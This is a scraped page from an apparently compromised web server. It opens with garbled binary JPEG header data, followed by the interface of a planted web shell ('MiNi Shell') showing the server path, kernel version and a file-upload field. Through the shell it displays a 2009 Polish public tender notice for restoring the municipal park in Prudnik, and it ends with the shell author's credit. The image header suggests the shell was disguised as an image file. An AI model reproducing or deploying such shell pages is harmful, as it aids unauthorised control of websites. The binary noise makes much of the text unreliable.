JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128223-N-2009.html

<p class="kh_header"><b>Prudnik: Dziedzictwo przyrodnicze miast Prudnik i Bruntal nowym transgranicznym produktem turystycznym - Rewaloryzacja zabytkowego Parku Miejskiego w Prudniku</b><br>
<b>Numer ogłoszenia: 128223 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Prudnik , ul. Kościuszki 3, 48-200 Prudnik, woj. opolskie, tel. 077 4066200, faks 077 4066228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prudnik.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dziedzictwo przyrodnicze miast Prudnik i Bruntal nowym transgranicznym produktem turystycznym - Rewaloryzacja zabytkowego Parku Miejskiego w Prudniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rewaloryzacja zabytkowego Parku Miejskiego w Prudniku w zakresie:
1. Ciągi komunikacji pieszej :
1)  place żwirowe (w tym plac przed pawilonem muzycznym) bez alejek  wewnętrznych,
	2)  chodniki wzdłuż ulic Staszica, Dąbrowskiego i Parkowej o  nawierzchni  z kostki betonowej,
3)  chodnik - główny ciąg komunikacji pieszej - od ul. Staszica do ul. Mickiewicza o nawierzchni
     z płyt granitowych, kostki granitowej, bazaltowej i betonowej,
4)  ścieżka rowerowa wzdłuż ul. Staszica,
	5)  placyk przed pomnikiem, 
	6)  ścieżki i nawierzchnie placów zabaw - żwirowe, z płyt betonowych, z kostki betonowej, z kostki
                   granitowej, syntetyczne, z kostki bazaltowej,
	7)  nawierzchnia źródełka F2 oraz ścieżki O1 z kostki granitowej i żwirowej,
2.  Plac zabaw dla dzieci P1, P3, P4, P5, P6.
3.  Rolkowisko P2.
4.  Odtworzenie źródełka F2.
5.  Remont fontanny F1.
6.  Remont Pomnika 700 lecia  Prudnika M1.
7.  Remont Pomnika Powstańców M3.
8.  Odwodnienie terenu i wykonanie sieci kanalizacji deszczowej i sanitarnej (uwaga odwodnienie terenu   
     boisk B1 i B2 włączyć do kanalizacji deszczowej w ul. Staszica)
9.  Budowa wodociągu doprowadzającego wodę w rejon rezerwy terenowej przewidzianej pod funkcje   
     usługowe oraz do sztucznego źródełka . 
10. Oświetlenie terenu (bez terenu boisk B1 i B2 - oświetlenie zrealizowano w ramach 
      programu Moje boisko - ORLIK 2012- w załączeniu mapa ).
11. Elementy małej architektury. 
12. Gabloty reklamowe, ławki, kosze na śmieci, balustrady, tablice informacyjne  i regulaminowe.
13. Prace rozbiórkowe - podest, schody, źródełko, balustrady, barierki i pochwyty, elementy malej    
      architektury.

Przedmiot zamówienia nie obejmuje:
1.	Remontu boisk sportowych B1 i B2.
2.	Nasadzeń przy źródełku,
3.	Remontu budynku po byłych ubikacjach P7.
4.	Remontu pawilonu muzycznego.
5.	Nasadzeń układów roślinnych.
6.	Wewnętrznych alejek parkowych o nawierzchni żwirowej.

						
 
Szczegółowy opis przedmiotu zamówienia zawiera:
1) Dokumentacja  techniczna -  Projekt budowlany i  budowlano wykonawczy:
-  P1 Zagospodarowanie terenu, P2 Projekt  architektoniczno-budowlany cz 1, cz 2,
- P1 zagospodarowanie terenu,
- P2 projekt architektoniczno-budowlany
- P4 projekt ciągów komunikacji pieszej
- P5 Projekt sieci i instalacji elektrycznych
- P6 projekt sieci i instalacji wodno-kanalizacyjnych
- Projekt gablot reklamowych
- Rysunek Moje boisko - ORLIK  2012
- Rozwiązania równoważne

2)  Przedmiar robót,
-  Elementy małej architektury, gabloty reklamowe	
-  Kanalizacja deszczowa i modernizacja rowów odwadniających	
-  Prace rozbiórkowe obiektów budowlanych małej architektury	
-  Sieć wodociągowa						
-  Sieci zewnętrzne i oświetlenie terenu				
-  Ciągi komunikacji pieszej					

3)  Specyfikacje techniczne wykonania i odbioru robót:
-  ogólna specyfikacja techniczna wykonania i odbioru robót,
-  specyfikacja techniczna wykonania i odbioru robót - branża budowlana,
- specyfikacja techniczna wykonania i odbioru robót - branża drogowa,
- specyfikacja techniczna wykonania i odbioru robót - branża elektryczna,
- specyfikacja techniczna wykonania i odbioru robót - branża instalacyjna
4) Decyzje:
-  Opis znaczących oddziaływań na środowisko,
-  Decyzja nr 348 z dnia 10.05.2009 r.
-  Decyzja nr 231 z dnia 15.07.2008 r.
-  Pozwolenie konserwatorskie nr 579/N/05 z dnia 10.11.2005 r. 
-  Pozwolenie konserwatorskie nr WUOZ-I-GN-5600-495/08 z dnia 14.07.2008 r.
-  Pozwolenie konserwatorskie nr 32/N/09 z dnia 28.01.2009 r.
Zamówienie należy wykonać zgodnie ze sztuką budowlaną i obowiązującymi przepisami. 
Lokalizacja gablot może uledz zmianie w trakcie realizacji inwestycji wg ustaleń konserwatora zabytków.
Wykonawca zobowiązany jest do sporządzenia mapy powykonawczej dla całości przedmiotu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.11.12.00-0, 45.23.10.00-5, 45.23.20.00-2, 45.11.10.00-8, 45.23.00.00-8, 45.26.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz spełniają następujące warunki udziału:              

1)   Posiadają doświadczenie z ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,     
      wyrażające się tym, że wykonali  roboty odpowiadające swoim rodzajem  robotom  stanowiącym  przedmiot    
      zamówienia  i  łączną  wartością  minimum  4  000 000,00  PLN.  
      Za roboty odpowiadające swoim rodzajem  robotom stanowiącym przedmiot  zamówienia zamawiający   
      będzie uznawał wykonanie robót budowlanych polegających na:  budowie lub rozbudowie lub przebudowie   
      lub  remoncie dróg.  

2)  Dysponują osobami do kierowania robotami lub przedstawią pisemne zobowiązanie innych podmiotów do   
     udostępnienia  następujących osób:
-   kierownika budowy do kierowania robotami przy zabytkach nieruchomych,  posiadającego uprawnienia     
    budowlane w specjalności  konstrukcyjno-budowlanej. 
    Na podstawie ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z dnia 17  
    września 2003 r.) i Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac   
    konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także   
    innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań   
    ukrytych lub porzuconych zabytków ruchomych (Dz. U. z dnia 30 czerwca 2004 r.),  kierownik budowy    
    winien posiadać  co najmniej 2-letnią praktykę zawodową  na budowie przy zabytkach  nieruchomych lub   
    posiadać  zaświadczenie o kwalifikacjach na podstawie §  19 rozporządzenia Ministra    Kultury i   Sztuki z   
    dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy  zabytkach  i   
    archeologicznych prac wykopaliskowych (Dz. U. Nr  31, poz. 197) oraz § 17-19  rozporządzenia Ministra   
    Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń  na prowadzenie prac   
    konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich    
    prowadzenia i kwalifikacjach osób, które maja prawo prowadzenia tej działalności (Dz. U.  Nr 16, poz. 55).
-    kierownika robót posiadającego uprawnienia do kierowania  robotami drogowymi,
 -  kierownika robót posiadającego uprawnienia do kierowania robotami  w zakresie sieci elektrycznych, 
 -  kierownika robót posiadającego uprawnienia do kierowania robotami  w zakresie sieci wodno-  
    kanalizacyjnych, 
    Kierownik  budowy  oraz kierownicy robót winni  posiadać aktualne zaświadczenie o przynależności do     
    OIIB.


W przypadku Wykonawców wspólnie ubiegających się o zamówienie każdy z wykonawców musi wykazać że nie podlega wykluczeniu z postępowania.
Warunek  posiadania  wymaganego doświadczenia oraz potencjału  kadrowego muszą spełniać łącznie wszyscy Wykonawcy (wielkości stanowiące  o spełnieniu warunków będą zsumowane).


II. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń i dokumentów według formuły: spełnia / nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.    Oświadczenie o nie podleganiu wykluczeniu zgodnie z art. 24 ust. 1 i 2 ustawy Pzp na  formularzu  nr 2    
       będącym załącznikiem do SIWZ,
2.   Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na formularzu nr 3 stanowiącym  załącznik do  siwz. 
3.    Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności   
        gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności   
        gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.     Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu   
        Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio,    
        że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i   
        społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty    
        zaległych   płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie   
        wcześniej niż   3 miesiące przed upływem terminu składania ofert,
5.     wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania    
        o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,    
        odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem   
        ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te   
        zostały wykonane należycie (Formularz nr 4 ),  
6.     wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w   
        wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i   
        wykształcenia niezbędnych do wykonania zamówienia,  a także  zakresu wykonywanych przez nich   
        czynności (Formularz nr 5 ),  
7.     pisemne  zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,   
        jeżeli w wykazie, o którym mowa w pkt 6, wykonawca wskazał osoby, którymi  będzie dysponował,  
8.     dokumenty  stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają    
        wymagane uprawnienia do kierowania robotami  oraz  że posiadają aktualne  zaświadczenia o   
       przynależności do  OIIB,
9.    Oświadczenie,  że kierownik budowy posiada uprawnienia do kierowania robotami przy zabytkach   
       nieruchomych: posiada  co najmniej 2-letnią praktykę zawodową  na budowie przy zabytkach   
       nieruchomych lub posiada  zaświadczenie o kwalifikacjach na podstawie §  19 rozporządzenia Ministra   
       Kultury i   Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy   
       zabytkach  i archeologicznych prac wykopaliskowych (Dz. U. Nr  31, poz. 197) oraz § 17-19   
       rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń   
       na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych,   
       warunkach ich  prowadzenia i kwalifikacjach osób, które maja prawo prowadzenia tej działalności (Dz. U.   
       Nr 16, poz. 55).


10.   Zasady składania oferty przez podmioty występujące wspólnie:
- podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich   
  wykonawców   wspólnie ubiegających się o udzielenie zamówienia.
- wymagane oświadczenia i dokumenty wskazane w pkt  1,3,4,   powinny być złożone przez każdy podmiot.

11.      Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
	 1) Wykonawcy tacy zamiast dokumentów określonych w punktach 3, 4  niniejszego rozdziału  składają dokument lub dokumenty wystawione w kraju, w którym mają siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
	a) że nie otwarto ich likwidacji ani nie ogłoszono upadłości. Dokument nie może być wystawiony wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	b) nie zalegają oni z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne, zdrowotne albo że uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokument nie może być wystawiony wcześniej niż 3 miesiące przed upływem terminu składania ofert.
	c) nie orzeczono wobec nich zakazu ubiegania się o zamówienie. Dokument nie może być wystawiony wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	2)      Jeśli w kraju pochodzenia osoby, lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.prudnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Prudniku  ul.  Kościuszki  3,  48-200 Prudnik, pokój nr 226.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 12:00, miejsce: Urząd Miejski w Prudniku,  ul. Kościuszki 3, 48-200 Prudnik, sekretariat - pok. nr 102.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie  jest dofinansowane  z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska -Rzeczpospolita Polska na lata 2007 - 2013.

Creat By MiNi SheLL
Email: jattceo@gmail.com